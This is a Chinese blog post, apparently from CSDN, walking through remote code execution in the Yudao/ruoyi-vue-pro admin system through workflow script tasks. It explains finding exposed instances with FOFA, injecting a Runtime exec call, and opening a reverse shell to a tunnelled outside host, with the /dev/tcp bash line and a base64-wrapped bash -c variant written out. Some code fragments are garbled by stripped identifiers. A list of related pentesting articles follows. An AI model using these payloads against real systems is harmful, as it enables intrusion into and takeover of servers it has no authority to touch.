漏洞系统搭建/漏洞系统扫描-零基础渗透技巧

最新推荐文章于 2026-06-20 15:48:15 发布
原创 最新推荐文章于 2026-06-20 15:48:15 发布 · 957 阅读 ·
大模型引用 1
·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
GEO检测
cknow-ai 程序员六七

cknow-ai 关注

标签
#脚本 #流程 #命令
分类 信息安全与密码学

漏洞系统搭建/漏洞系统扫描-零基础渗透技巧

本帖旨在于技术交流,请勿进行非法攻击行为。

芋道管理系统是当前gitee上最受欢迎的开源系统,其收到的Start数量已经超过50k,该系统集成多种功能于一身,被众多企业所接受。但是越强大的的功能则越容易引入高风险的安全问题,通过代码审计发现该系统集成了流程组件,该组件通过解析xml模板实现流程部署与执行,我们可以利用其支持解析动态脚本的特性注入恶意代码,从而实现RCE,接下来我们将针对该漏洞进行简要分析。

项目信息:

芋道源码

Ruoyi-vue-pro

image-20230401235841904

一、资产定位

通过fofa搜索 芋道管理系统 即可

image-20230402000442938

二、攻击示例

新建一个流程模板

image-20230402000724292

设计模板

新增一个脚本任务,脚本类型设置为,脚本内容为java.lang..().exec()

此时我们先用探测一下命令是否真的能够执行

image-20230402001231203

保存模型,绑定表单,发布流程

image-20230402001541862

进入我的流程发起一个新的流程,此时命令已经触发

image-20230402001636109

通过监听到了域名解析请求,证明命令成功执行

image-20230402005823483

三、

懒得搞,直接反弹shell吧

1.利用花生壳进行内网穿透

具体操作可以百度,这里不进行详细介绍,其实你也可以自己买一个云服务器进行监听

参考:

image-20230402002900704

2.构造POC

这里容易踩坑,java.lang..().exec()是不能直接进行多参数命令处理的,而反弹shell的命令需要包含多个参数

java.lang..().exec("bash -i>& /dev/tcp/.zicp.fun/50392 0>&1");

上述命令会报错,不能执行

我们需要转换为的命令形式S

java.lang..().exec("bash -c {echo,==}|{,-d}|{bash,-i}");

参考:

重复上述第二步,再次发起一个流程,我们可以在Kali上监听到反弹过来的shell,从而获取系统控制权。

image-20230402005349834

image-20230402004354508

四、总结

其实流程脚本任务不仅支持JS脚本,还支持,等脚本,其底层原理则是调用java中对应语言的解析函数,如JS脚本则是调用了中的eval函数。据了解,流程引擎还支持表达式解析,所以该组件还存在其它的注入可能,以上仅对脚本注入的攻击形式进行了简单的探讨。这样的漏洞适用于几乎所有集成流程管理功能的系统,比如若依、Guss等系统均存在此类问题。

~

网络安全学习,我们一起交流

~

点赞 点赞 4
评论 0
书签 书签 2
第三方系统访问源码接口,需要签名验证,资源为访问调用接口代码示例
02-28
第三方系统访问源码接口,需要签名验证,资源为访问调用接口代码示例。
Apache OFBiz 反序列化RCE
05-03 336
只因苦难多壮志,不教红尘惑坚心。
漏洞案例】EDUSRC前台寻找突破口到最终接管后台管理员账户
m0_56019217的博客
08-26 1160
本文记述了一次网站渗透测试过程。测试者通过IP收集发现80端口静态页面,后经443端口进入前台系统。在信息收集过程中,发现接口信息泄露,获取后台管理员登录地址和密码,成功接管后台。随后在后台发现存储桶URL,存在列桶漏洞和任意文件写入/覆盖风险。过程中还发现前台上传点存在XSS漏洞。最终测试者通过细心分析历史数据包和运用新学到的存储桶知识,成功挖掘多个漏洞。文章强调了"能积微者速成"的学习理念,指出平时积累的知识终有用武之地。
不止于生成:用源码构建学生管理系统时,我踩过的这些数据库和索引的坑
weixin_30415113的博客
03-31 453
本文通过源码构建学生管理系统的实战经验,详细解析了数据库设计和索引优化的七个高阶避坑指南。从主子表索引设计、一对多关系查询优化到软删除引发的性能问题,提供了实用的解决方案和最佳实践,帮助开发者在代码生成的基础上提升系统性能。
SSO安全指南:用框架防止授权码模式下的重放攻击与CSRF漏洞
weixin_30415113的博客
03-21 67
本文详细介绍了如何使用框架(yudao)在单点登录(SSO)系统中防止授权码模式下的重放攻击与CSRF漏洞。通过动态State机制、授权码生命周期管理和渗透测试实战案例,展示了框架在企业级SSO安全设计中的高效防护能力,帮助开发者构建更安全的身份验证系统
rce漏洞分析
若有战,召必回
10-28 1798
通过这个代码可以分析出是执行了数据库查询的语句,但是这里也不可能发生sql注入,应为where语句中的参数采用了数组的传递方式,可以有效的避免sql注入漏洞,因为通过数组传递的参数会经过addslashes和htmlspecialchars的过滤。前几日在浏览github项目时,发现之前审计过的一个cms更新了,从日志中看到修复了一个安全漏洞,由于源码是开源的,所以可以根据版本对比找到修补的地方,进而发现其修复的地方。在上面的补丁中也强制判断了参数必须是字符串,所以漏洞应该出现在传入的参数时数组的情况下。
管理系统 运行报错
zhiquz_1021的博客
05-10 779
渗透测试入门实战:从Kali Linux到Metasploit的完整攻防演练
最新发布
weixin_30843605的博客
06-20 352
网络安全的核心在于主动发现并修复系统弱点,渗透测试正是实现这一目标的关键技术。其原理是通过模拟真实攻击者的行为,在合法授权范围内对目标系统进行安全评估,从而验证防御体系的有效性。这项技术的价值在于能将潜在的安全风险可视化,为安全加固提供明确依据,广泛应用于金融、互联网、政企等对安全性要求极高的领域。在实践层面,Kali Linux作为行业标准的渗透测试操作系统,集成了Nmap、Burp Suite等数百款工具,为安全人员提供了开箱即用的强大武器库。而Metasploit框架则进一步将漏洞利用模块化,极大地提
渗透测试工具——漏洞扫描工具
热门推荐
weixin_59872639的博客
01-16 3万+
安全漏洞产生的原因 技术原因 软件系统复杂性提高,质量难于控制,安全性降低 公用模块的使用引发了安全问题 经济原因 “柠檬市场”效应——安全功能是最容易删减的部分 环境原因 从传统的封闭、静态和可控变为开放、动态和难控 攻易守难 安全缺陷 安全性缺陷是信息系统或产品自身“与生俱来”的特征,是其“固有成分” 安全漏洞是与生俱来的 系统设计缺陷 Internet从设计时就缺乏安全的总体架构和设计 TCP/IP中的三阶段握手. 软件源代码的急剧膨胀 Windows 95 1500万行
kali linux渗透测试之漏洞扫描
qq_57223070的博客
09-26 2万+
skipfish、nessus、AWVS、nikto的简单使用及功能倾向介绍。
Kali渗透-NMAP高级使用技巧漏洞扫描发现
Shmily17s的博客
11-19 1万+
4.1 NMAP高级使用技巧 4.1.1 NMAP概述 nmap可用于 检测活在网络上的主机 检测主机上开放的端口 检测到相应的端口的软件和版本 检测操作系统,硬件地址,以及软件版本 检测脆弱性的漏洞(nmap脚本) 4.1.2 NMAP端口状态解析 4.1.3 NMAP的语法及示例 nmap 可以扫内网,也可以扫描外网 直接使用nmap nmap 192.168.1.63 nmap ...
Kali Linux渗透测试——漏洞扫描
Captain_RB的博客
02-09 1万+
由于漏洞扫描中基于服务扫描结果速度太慢,搜索已公开漏洞数据库数量过于庞大,所以一般使用漏洞扫描器实现。扫描器的功能包括发现IP,识别OS、服务、配置、漏洞,并能够格式化信息,对搜索结果进行筛选、分组,生成报告信息。利用nmap扫描脚本可以对一些特定的漏洞进行扫描,但是其提供的信息及功能有限,下面介绍两种功能强大的漏洞扫描器。...
漏洞扫描渗透测试的区别
weixin_51725318的博客
02-09 1119
漏洞扫描渗透测试的区别
渗透测试和漏洞扫描的区别
LMD_BTBU的博客
10-11 7192
因为最近在探究关于工控安全的研究课题,在渗透测试和漏洞扫描这两个概念上有点区分不太清楚,查了很多资料都觉得不够清楚,难以理解,于是在FreeBuf.COM上看到了一篇文章—《浅谈渗透测试与漏洞扫描》,觉得其解释得十分清楚,因此特转载分享。 我们可从以下四点来解释其区别: 1、概念 渗透测试:渗透测试并没有一个标准的定义,国外一些安全组织达成共识的通用说法;通过模拟恶意黑客的攻击方法,来评估计算机网...
基于 Python 的漏洞扫描系统,附源码
IT徐师兄
02-08 4785
鉴于网络安全的重要性,网络的漏洞扫描作为最基础也是最实用的一种方式能够很好的对网络端口进行渗透测试,通过渗透测试技术来对网站进行漏洞的危险程度的描述,形成可视化的评估结果。
渗透测试之漏洞扫描
JLN1789015334的博客
03-21 1128
主要介绍了部分漏洞扫描的工具的使用。
腾讯面试:渗透测试和漏洞扫描有什么区别?
jklbnm12的博客
06-30 1964
前言: 上半年,时断时续的网络安全事件已经过去,下半年的事件又不得不重新开始。最近有意思的是,我的一个朋友几天前去参加一个技术面试,被一个简单的问题“渗透测试和漏洞扫描有什么区别”甩了,当时,我也有点困惑。说实话,对于一个小白新手来说,两者的区别可能是一、二、三。对于当时的面试官,我是否也会说这两个是不同的呢?不管怎么说,这都是关于发现漏洞,使用漏洞,采取服务器webshell,提高权利,内网渗透,权限维护等。但如果你给出这样的技术答案,你会像我的朋友一样不及格,如果你遇到一个好心的面试官,你可能会留.
渗透测试与漏洞扫描详解
xinzhouqifu6的博客
09-24 4818
#等级保护办理# 等级保护测评过程中,包含了多项指标的测评,其中还有漏洞扫描渗透测试。作为维护企业安全的两种不同类型,漏洞扫描渗透测试的重要性经常会被混淆。在等保合规建设中,是选择漏洞扫描,还是选择渗透测试?这成为了企业关注的问题。 一、概念: 渗透测试(Penetration Test,PT)是完全模拟黑客可能使用的攻击技术和漏洞发现技术,对目标系统的安全做深入的探测,发现系统最脆弱的环节。渗透测试和黑客入侵最大区别在于渗透测试是经过客户授权,采用可控制、非破坏性质的方法和手段发现目标和网络设备
kali linux 漏洞扫描
ztc131450的博客
03-10 1608
Kali Linux是一款专为渗透测试和网络安全领域而设计的操作系统,它集成了大量的安全测试工具,可以帮助安全专家和黑客发现网络中的漏洞并加以修补。在Kali Linux中,漏洞扫描是一个非常重要的功能,它可以帮助用户快速、准确地发现系统中存在的漏洞,并提供相应的修复建议。漏洞扫描是网络安全工作中的一个关键环节,通过扫描系统中的漏洞,安全专家可以及时发现潜在的安全风险,并加以修复,从而有效地保护系统的安全。Kali Linux。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值